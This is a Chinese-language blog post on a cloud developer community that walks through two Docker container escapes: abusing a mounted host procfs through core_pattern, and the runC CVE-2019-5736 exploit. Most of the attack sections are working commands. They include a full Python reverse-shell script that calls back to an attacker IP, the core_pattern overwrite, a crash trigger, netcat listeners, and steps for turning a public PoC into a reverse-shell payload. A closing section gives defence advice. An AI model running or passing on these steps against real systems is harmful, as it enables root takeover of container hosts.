前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Docker逃逸CVE-2019-5736、procfs云安全漏洞复现,全文5k字,超详细解析!

Docker逃逸CVE-2019-5736、procfs云安全漏洞复现,全文5k字,超详细解析!

原创
作者头像
小羽网安
发布2024-07-06 19:33:59
390
发布2024-07-06 19:33:59
举报
文章被收录于专栏:系统安全系统安全

Docker容器挂载procfs 逃逸

procfs是展示系统进程状态的虚拟文件系统,包含敏感信息。直接将其挂载到不受控的容器内,特别是容器默认拥有root权限且未启用用户隔离时,将极大地增加安全风险。因此,需谨慎处理,确保容器环境安全隔离。

利用文件/proc/sys/kernel/core_pattern它在Linux系统中,如果进程崩溃了,系统内核会捕获到进程崩溃信息,将进程崩溃信息传递给这个文件中的程序或者脚本。

自Linux内核2.6.19版本起,/proc/sys/kernel/core_pattern配置迎来了新扩展。若此文件首字符为管道符'|',紧随其后的内容即被识别为指向用户空间程序或脚本的指令,系统将在生成核心转储时自动调用执行这些外部程序或脚本。这一特性增强了核心转储处理的灵活性与定制化能力。

漏洞复现

1、漏洞环境搭建

创建一个容器并挂载 /proc 目录

代码语言:javascript
复制
docker run -it --rm -v /proc/:/host/ ubuntu

执行以下命令,如果返回 Procfs is mounted. 说明当前挂载了 procfs,如果返回 Procfs is not mounted. 则说明没有挂载。

代码语言:javascript
复制
find / -name core_pattern 2>/dev/null | wc -l | grep -q 2 && echo "Procfs is mounted." || echo "Procfs is not mounted."

漏洞利用

代码语言:javascript
复制
# 安装gcc c文件是执行不了的,需要安装gcc来执行c文件
apt update && apt install -y gcc

反弹shell脚本

代码语言:javascript
复制
cat > /tmp/.t.py <<EOF
#!/usr/bin/python
import  os
import pty
import socket
lhost = "反弹shell的攻击机ip"
lport = 8888
def main():
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((lhost, lport))
   os.dup2(s.fileno(), 0)
   os.dup2(s.fileno(), 1)
   os.dup2(s.fileno(), 2)
   os.putenv("HISTFILE", '/dev/null')
   pty.spawn("/bin/bash")
   # os.remove('/tmp/.t.py')
   s.close()
if __name__ == "__main__":
   main()
EOF

赋予执行权限

代码语言:javascript
复制
chmod 777 /tmp/.t.py

Linux核心转储程序通过宿主机文件系统执行,利用/etc/mtabupperdir定位容器挂载点。容器未提交的文件变动,在此宿主机路径上可见。

代码语言:javascript
复制
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)

写入反弹shell

代码语言:javascript
复制
echo -e "|$host_path/tmp/.t.py \rcore" > /host/sys/kernel/core_pattern

在攻击机上开启一个监听

代码语言:javascript
复制
nc -lvvp 8888

然后在容器里运行一个可以崩溃的程序

代码语言:javascript
复制
cat > /tmp/t.c <<EOF
#include<stdio.h>
int main(void)  {
   int *a  = NULL;
   *a = 1;
   return 0;
}
EOF
# 编译程序并执行
cd /tmp
gcc t.c -o t && ./t

如果出现了如下情况,攻击机也没有反应,那么多半是因为攻击机器没有放行8888端口

kali放行8888端口,使用iptables

代码语言:javascript
复制
iptables -A INPUT -p tcp --dport 8888 -j ACCEPT

此时重新执行c文件

代码语言:javascript
复制
./t 
# 或者
gcc t.c -o t && ./t

攻击机器即可接收反弹的shell

Docker runC逃逸-CVE-2019-5736

概述:

2019年2月,runC维护团队披露了一个严重安全漏洞CVE-2019-5736,由SUSE Linux的高级软件工程师Aleksa Sarai发现。此漏洞影响Docker、containerd、Podman、CRI-O等广泛使用的容器运行时,对IT环境和主流云平台如AWS、Google Cloud构成重大威胁。攻击者利用此漏洞可实现容器逃逸,获取宿主机的root权限,进而控制主机上的所有容器。

漏洞原理:

漏洞根源在于runC,一个作为容器底层运行时的开源工具,早期作为Docker的一部分开发,后独立出来。runC由高级别容器运行时(如Docker)调用,负责容器的创建与进程管理。在受影响版本中(「Docker 18.09.2之前,runc版本低于1.0-rc6」),攻击者可通过特定容器镜像或exec操作,获取宿主机上runC的文件句柄,进而篡改runc二进制文件。这一操作允许攻击者以root权限在宿主机上执行任意命令,实现完全控制。

影响版本

docker version <=「18.09.2」 RunC version <=「1.0-rc6」

环境安装

我这里是香港服务器 centos 7.9,一台攻击机腾讯云服务器

❝ 这里我推荐腾讯云服务器,新用户99元可以用一年,自带docker加速服务,当靶场必备===>https://curl.qcloud.com/T7dJtWo1 ❞

依次执行如下命令,即可安装成功docker-18.03.1

代码语言:javascript
复制
sudo yum update -y
sudo yum install -y yum-utils device-mapper-persistent-data lvm2
sudo yum-config-manager --add-repo https://download.docker.com/linux/centos/docker-ce.repo
sudo yum install -y docker-ce-18.03.1.ce
sudo systemctl start docker
sudo systemctl enable docker
docker --version

❝ Tips:6月开始国内大部分docker源都不能使用了,要么使用香港或者国外操作系统,或者推荐「龙蜥操作系统」,就算搭建本地也自带外网加速 ❞

这里docker版本原因,pull不了镜像,可以pull本地,这里我准备好了一个docker可以直接用的ubuntu镜像,【小羽网安】后台回复即【ubuntu】,小伙伴们不要回复错奥,ubuntu,ubuntu,ubuntu~

将自己下载的ubuntu.tar上传到自己的靶机上,使用docker加载本地镜像

代码语言:javascript
复制
docker load -i ubuntu.tar

启动示例

代码语言:javascript
复制
docker run -d --name my_ubuntu_container ubuntu /bin/bash -c "tail -f /dev/null"

漏洞复现

第一步:生成payload

下载CVE-2019-5736编译go脚本生成攻击payload。(https://github.com/Frichetten/CVE-2019-5736-PoC),将go脚本中的命令修改为反弹shell(附件)

将此内容进行更改,设置「nc」监听地址。

编译生成payload(需要go环境,yum install go) ,也叫可执行文件,为linux系统

代码语言:javascript
复制
CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

建议打快照,漏洞复现完成会造成docker无法使用。

第二步:开始攻击

将该payload拷贝到docker容器中(这就是模拟攻击者获取了docker容器权限,在容器中上传payload进行docker逃逸)

代码语言:javascript
复制
docker cp main df9370449f96:/home  #拷贝
docker exec -it df9370449f96 /bin/bash  #进入该ubuntu容器

执行payload,等待受害者去启动docker容器。

攻击机器开启瑞士军刀监听之前先放行1234端口

代码语言:javascript
复制
[root@lavm-izz8p5423g CVE-2019-5736-PoC-master]# systemctl start firewalld
[root@lavm-izz8p5423g CVE-2019-5736-PoC-master]# sudo firewall-cmd --zone=public --add-port=1234/tcp --permanent
success

开启监听

诱导受害机重新进入容器。(「bash/sh」启动)

受害者启动docker容器时,触发payload,成功反弹shell。

whoami,漏洞利用成功

总结

本文详细展示了两种Docker容器安全漏洞的复现过程,分别是通过伪文件系统procfs的逃逸攻击和CVE-2019-5736 runC逃逸漏洞。这两种攻击均利用了容器与宿主机之间的不当隔离或软件缺陷,实现了从容器内部向宿主机环境的非法访问和控制。

procfs逃逸攻击总结
  1. 「漏洞原理」:通过挂载宿主机的/proc目录到容器内,攻击者能够访问并修改宿主机上的关键系统文件,如/proc/sys/kernel/core_pattern,从而在进程崩溃时执行任意代码。
  2. 「复现步骤」
    • 创建一个挂载/proc目录的Docker容器。
    • 在容器内安装gcc并编写反弹shell的Python脚本。
    • 修改宿主机上的/proc/sys/kernel/core_pattern文件,使其指向容器内的反弹shell脚本。
    • 在容器内制造进程崩溃,触发核心转储机制,执行反弹shell脚本,从而在攻击机上获得宿主机的shell访问权限。
  3. 「防御建议」
    • 避免将宿主机的敏感目录(如/proc)挂载到容器中。
    • 容器应运行在非特权用户模式下,限制其对宿主机的访问权限。
    • 监控并审计容器内的活动,及时发现异常行为。
CVE-2019-5736 runC逃逸漏洞总结
  1. 「漏洞原理」:在受影响的Docker和runC版本中,攻击者可以通过特定容器镜像或exec操作获取宿主机上runC的文件句柄,进而篡改runc二进制文件,实现以root权限执行任意命令。
  2. 「复现步骤」
    • 在受影响的Docker环境中安装并运行易受攻击的容器。
    • 编译并准备用于漏洞利用的payload(一个Go语言编写的可执行文件)。
    • 将payload拷贝到容器中并执行,等待宿主机上的Docker活动触发payload。
    • 在攻击机上监听特定端口,当受害机上的Docker活动触发payload时,成功接收反弹的shell。
  3. 「防御建议」
    • 及时更新Docker和runC到最新版本,避免使用已知存在漏洞的旧版本。
    • 实施最小权限原则,限制容器内进程的运行权限。
    • 使用容器安全扫描工具定期检测容器镜像和运行时环境中的潜在漏洞。
    • 对宿主机和容器进行严格的访问控制和隔离,减少潜在的攻击面。

通过本文的复现过程,我们可以深刻认识到容器安全的重要性以及及时更新和维护软件版本的必要性。随着容器技术的广泛应用,确保容器环境的安全将成为IT运维和安全团队的重要任务。

原文链接:

https://mp.weixin.qq.com/s/z6lvfHo3_S6Qtl67gJPTtA

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • Docker容器挂载procfs 逃逸
    • 漏洞复现
      • 1、漏洞环境搭建
  • Docker runC逃逸-CVE-2019-5736
    • 概述:
      • 漏洞原理:
        • 影响版本
          • 环境安装
            • 漏洞复现
              • 第一步:生成payload
              • 第二步:开始攻击
            • 总结
              • procfs逃逸攻击总结
              • CVE-2019-5736 runC逃逸漏洞总结
          相关产品与服务
          容器服务
          腾讯云容器服务(Tencent Kubernetes Engine, TKE)基于原生 kubernetes 提供以容器为核心的、高度可扩展的高性能容器管理服务,覆盖 Serverless、边缘计算、分布式云等多种业务部署场景,业内首创单个集群兼容多种计算节点的容器资源管理模式。同时产品作为云原生 Finops 领先布道者,主导开源项目Crane,全面助力客户实现资源优化、成本控制。
          领券
          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档